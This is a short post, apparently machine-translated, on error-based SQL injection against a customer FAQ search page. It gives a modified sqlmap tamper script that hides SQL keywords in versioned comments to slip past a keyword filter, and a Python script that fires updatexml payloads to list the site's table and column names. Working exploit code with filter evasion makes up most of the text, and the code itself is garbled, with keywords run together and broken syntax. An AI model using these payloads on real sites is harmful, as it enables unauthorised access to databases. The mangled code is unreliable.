Use Slqmap to run Updatexml injection found blocking keyword, and then inline injection can be around, and finally modify the halfversionedmorekeywords.py script, the results Sqlmap or not run out. >_<
The halfversionedmorekeywords.py script is modified as follows:
#!/usr/bin/env pythonImportOSImportRe fromLib.core.commonImportSingletimewarnmessage fromLib.core.dataImportKB fromLib.core.enumsImportDBMS fromLib.core.enumsImport Priority fromLib.core.settingsImportIgnore_space_affected_keywords__priority__=Priority . Higherdefdependencies (): Singletimewarnmessage ("tamper script '%s ' is only meant to be run against%s < 5.1"% (Os.path.basename (__file__). Split (".") [0], DBMS. MYSQL))defTamper (Payload, * *Kwargs): defprocess (Match): Word= Match.group ('Word') ifWord.upper ()inchKb.keywords andWord.upper () not inchignore_space_affected_keywords:returnMatch.group (). replace (Word,"/*!12345%s*/"%word)Else: returnmatch.group () RetVal=PayloadifPayload:retval= Re.sub (r"( ? <=\w) (? p<word>[a-za-z_]+) (? =\w|\z)",Lambdamatch:process (Match), RetVal) RetVal= Retval.replace ("/*!0","/*!0") returnRetVal
Write a script yourself, and then have the following code, successfully run out of table names and fields.
#Coding=utf-8ImportRequestsImportRe, binascii, warnings, timewarnings.filterwarnings ("Ignore") Table_name_list= [] forKinchRange (1,112): #Traverse table NameURL ="https://xxx:6002/customer/faq.php?code=faq&category=&" "Searchopt=content&searchkey=1 '/*!and*//*!updatexml*/" "(1,concat (0x7e, (select/*!table_name*//*!from*/information_schema.tables limit"+ str (k) +", 1), 0x7e), 3)---" "&x=4&y=23"req=requests.get (URL) a= Re.findall (r"' ~ (. *) ~ '", Req.text)ifa:table_name_list.append (a[0])Else:PassPrinttable_name_list forIinchtable_name_list:PrintU"the table name is:", I#output Table name #Traverse Word LengthURL ="Https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" "'/*!and*//*!updatexml*/(1,concat (0x7e," "(/*! select*//*!distinct*/concat (0x7e,/*!count (column_name) */,0x7e)/*! from*//*!information_schema.columns*/" "where/*!table_name=0x"+str (Binascii.b2a_hex (i)) +"*/), 0x7e), 3)---&x=4&y=23"req=requests.get (URL) b= Re.findall (r"' ~ (. *) ~ '", Req.text)ifb:m= Int (B[0].strip ("~")) +1PrintU"the number of rows is:"M#number of output lines forNinchRange (1, m):#traversing field namesURL ="Https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" "'/*!and*//*!updatexml*/(1,concat (0x7e," "(/*! select*//*!distinct*/concat (0x7e,/*!column_name*/,0x7e)/*! from*//*!information_schema.columns*/" "where/*!table_name=0x"+str (Binascii.b2a_hex (i)) +"*/Limit"+STR (n) +", 1), 0x7e), 3)---&x=4&y=23"req=requests.get (URL) c= Re.findall (r"' ~ (. *) ~ '", Req.text)ifC:PrintU"fields:", str (c). Strip ("[u ' ~"). Strip ("~ ']") Else:Pass Else:Pass
Call a hole. Bye.
Updataxml inject Python script